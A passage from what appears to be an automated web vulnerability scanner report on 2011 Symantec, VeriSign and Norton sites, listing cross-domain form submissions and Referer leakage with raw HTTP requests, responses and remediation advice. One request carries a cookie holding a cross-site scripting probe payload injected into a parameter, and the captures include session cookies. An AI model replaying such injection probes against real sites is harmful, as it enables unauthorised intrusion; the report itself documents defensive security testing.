GET /renewals/chat_form.jsp HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?page=renewal_search.jsp&action=button(submit) User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(document.location)//6e6ee0889dd&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; JSESSIONID=kTPJTqGNKfPrjNnpLGPypQ8JJCYnkLr5W1R124KMsH1FBQvFMQ07!1524362598; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_pers=%20s_nr%3D1315622354515-New%7C1336358354515%3B%20event69%3Devent69%7C1336358354517%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/11; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%2526rmkr-symlrc-cust-prod%253D%252526pid%25253DsymRen%2525253ALRC%2525253ARenewals%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:39:05 GMT Content-Type: text/html Content-Length: 15726 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- BEGIN IMPORT_INCLUDE--> <!--END IMPORT_INCLUDE--> <html> <head><ti...[SNIP]... <body><FORM action="https://admin.instantservice.com/Customer" method="post" name="custform"> <INPUT TYPE="HIDDEN" NAME="ai" VALUE="6227">...[SNIP]...
13.18. http://www.verisign.ch/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com . The form contains the following fields:
Request
GET /?tid=header-logo HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 31344 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]...
13.19. http://www.verisign.ch/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com . The form contains the following fields:order_number application_locale
Request
GET /?tid=header-logo HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 31344 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... </h4> <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top"> <fieldset id="myacc_fieldset">...[SNIP]...
13.20. http://www.verisign.ch/contact-information/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/contact-information/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com . The form contains the following fields:
Request
GET /contact-information/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 39107 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="/assets/corp/css/corp_generic_st...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]...
13.21. http://www.verisign.ch/contact-information/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/contact-information/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com . The form contains the following fields:order_number application_locale
Request
GET /contact-information/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 39107 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="/assets/corp/css/corp_generic_st...[SNIP]... </h4> <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top"> <fieldset id="myacc_fieldset">...[SNIP]...
13.22. http://www.verisign.ch/corporate/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/corporate/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com . The form contains the following fields:order_number application_locale
Request
GET /corporate/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 36193 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag...[SNIP]... </h4> <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top"> <fieldset id="myacc_fieldset">...[SNIP]...
13.23. http://www.verisign.ch/corporate/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/corporate/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com . The form contains the following fields:
Request
GET /corporate/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 36193 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]...
13.24. http://www.verisign.ch/trust-seal/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/trust-seal/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com . The form contains the following fields:
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 50059 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>VeriSign Trust Seal - Perfec...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]...
13.25. http://www.verisign.ch/trust-seal/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/trust-seal/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com . The form contains the following fields:order_number application_locale
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 50059 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>VeriSign Trust Seal - Perfec...[SNIP]... </h4> <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top"> <fieldset id="myacc_fieldset">...[SNIP]...
14. Cross-domain Referer leakage
previous
next
There are 70 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form. If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise. You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application. Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure. Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
14.1. http://blogs.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blogs.verisign.com
Path:
/
Issue detail
The page was loaded from a URL containing a query string:http://blogs.verisign.com/?tid=footer The response contains the following links to other domains:http://feeds.feedburner.com/WebUserExperienceBlog http://www.symantec.com/ http://www.symantec.com/connect/blogs/authentication-business http://www.symantec.com/connect/blogs/authentication-user http://www.symantec.com/connect/item-feeds/blog/691,29651/feed/all/all http://www.symantec.com/connect/item-feeds/blog/691,29681/feed/all/all http://www.verisign.be/ http://www.verisign.ch/ http://www.verisign.de/ http://www.verisign.dk/ http://www.verisign.es/ http://www.verisign.fr/ http://www.verisign.in/ http://www.verisign.it/ http://www.verisign.se/ http://www.verisignchina.com.cn/ https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
Request
GET /?tid=footer HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Wed, 11 May 2011 20:19:01 GMT ETag: "1a606f6-9f7a-c8827740" Accept-Ranges: bytes Content-Length: 40826 Content-Type: text/html; charset=UTF-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=7" /> <...[SNIP]... <li><a href="http://www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="http://www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="http://www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="http://www.verisign.fr/"> France</a>...[SNIP]... <li><a href="http://www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="http://www.verisign.in/"> India</a>...[SNIP]... <li><a href="http://www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="http://www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="http://www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="http://www.verisign.ch/"> Switzerland</a>...[SNIP]... <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.com&lang=en">...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <p class="title"><a href="http://www.symantec.com/connect/blogs/authentication-user" class="blueContentTitle"> User Authentication Blog</a>...[SNIP]... <div class="images"> <a href="http://www.symantec.com/connect/blogs/authentication-user"> <img src="//www.verisign.com/images/symc-blogs.jpg" alt="User Authentication Blog" /></a> <a href="http://www.symantec.com/connect/item-feeds/blog/691,29681/feed/all/all"> <img src="//www.verisign.com/images/rssIcon.gif" class="rssIcon" alt="RSS" />...[SNIP]... <p class="title"><a href="http://www.symantec.com/connect/blogs/authentication-business" class="blueContentTitle"> Business Authentication Blog</a>...[SNIP]... <div class="images"> <a href="http://www.symantec.com/connect/blogs/authentication-business"> <img src="//www.verisign.com/images/symc-blogs.jpg" alt="Business Authentication Blog" /></a> <a href="http://www.symantec.com/connect/item-feeds/blog/691,29651/feed/all/all"> <img src="//www.verisign.com/images/rssIcon.gif" class="rssIcon" alt="RSS" />...[SNIP]... </a> <a href="http://feeds.feedburner.com/WebUserExperienceBlog"> <img src="//www.verisign.com/images/rssIcon.gif" class="rssIcon" alt="RSS" />...[SNIP]... <p>VeriSign Authentication Services, now part of <a href="http://www.symantec.com" rel="external"> Symantec Corp.</a>...[SNIP]...
14.2. http://buy.norton.com/estore/mf/landingProductFeatures
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/estore/mf/landingProductFeatures
Issue detail
The page was loaded from a URL containing a query string:http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 The response contains the following links to other domains:http://store.symantec.com/?inid=us_estore http://www.mynortonaccount.com/ http://www.symantec.com/about http://www.symantec.com/about/profile/policies/eulas http://www.symantec.com/about/profile/policies/legal.jsp http://www.symantec.com/about/profile/policies/privacy.jsp http://www.symantec.com/business http://www.symantec.com/feedback/ http://www.symantec.com/home_homeoffice/support/special/upgrade2007/ http://www.symantec.com/norton http://www.symantec.com/norton/downloads/index.jsp http://www.symantec.com/partners https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=buy.norton.com&lang=en https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; LASTTIME_CV_DATE=Sep-09-2011 14:31:16; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); BIGipServerbuy1_prd_SSL=4046749583.16671.0000
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:18 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 55880 Connection: Keep-Alive <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js i...[SNIP]... <div id="globalNavMainInner1"> <a href="http://www.symantec.com/norton"> Norton</a>...[SNIP]... <div id="globalNavMainInner2"> <a href="http://www.symantec.com/business"> Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href="http://www.symantec.com/partners"> Partners</a>...[SNIP]... <div id="globalNavMainInner5"> <a href="http://www.symantec.com/about"> About Symantec</a>...[SNIP]... <div class="lftNavMainNav"> <a href="http://www.symantec.com/norton/downloads/index.jsp" title="" class="lftNavArrowMargin"> <span>...[SNIP]... <div class="lftNavMainNav"> <a title="" class=" lftNavArrowMargin" href="https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN"> Find My Order </a>...[SNIP]... <li> <a target="_parent" href="http://www.symantec.com/home_homeoffice/support/special/upgrade2007/"> Norton Update Center</a>...[SNIP]... <div class="verisign"> <a target="_blank" title="" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=buy.norton.com&lang=en"> <img title="Verisign" src="//buy-static.norton.com/estore/images//en/Non-Product/Logo/partner_logo/logo_verisign.png">...[SNIP]... <div class=" medBusinessUpgrade positioning "> <a href="http://store.symantec.com/?inid=us_estore"> <img width="718" height="75" src="//buy-static.norton.com/estore/images/en/Non-Product/Ad_Objects/bnr_smb_protectyourbiz_718.png">...[SNIP]... <span><a target="_blank" href="http://www.symantec.com/about/profile/policies/legal.jsp"> Legal Notices</a>...[SNIP]... <span><a target="_blank" href="http://www.symantec.com/about/profile/policies/privacy.jsp"> Privacy Policy</a>...[SNIP]... <span><a target="_blank" href="http://www.myNortonAccount.com "> Norton Account</a>...[SNIP]... <span><a target="_blank" href="http://www.symantec.com/about/profile/policies/eulas"> License Agreements </a>...[SNIP]... <span id="item4" class="footerItemBorder"><a target="_blank" href="http://www.symantec.com/feedback/"> Contact Us</a>...[SNIP]...
14.3. http://buy.norton.com/estore/mf/upgradeRenewal
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/estore/mf/upgradeRenewal
Issue detail
The page was loaded from a URL containing a query string:http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 The response contains the following links to other domains:http://www.mynortonaccount.com/ http://www.symantec.com/about http://www.symantec.com/about/profile/policies/eulas http://www.symantec.com/about/profile/policies/legal.jsp http://www.symantec.com/about/profile/policies/privacy.jsp http://www.symantec.com/business http://www.symantec.com/feedback/ http://www.symantec.com/home_homeoffice/support/special/upgrade2007/ http://www.symantec.com/norton http://www.symantec.com/norton/downloads/index.jsp http://www.symantec.com/norton/support/kb/web_view.jsp?wv_type=public_web&docurl=20080417101717EN http://www.symantec.com/partners https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_estore https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true; s_nr=1315621909816-New; event69=event69; 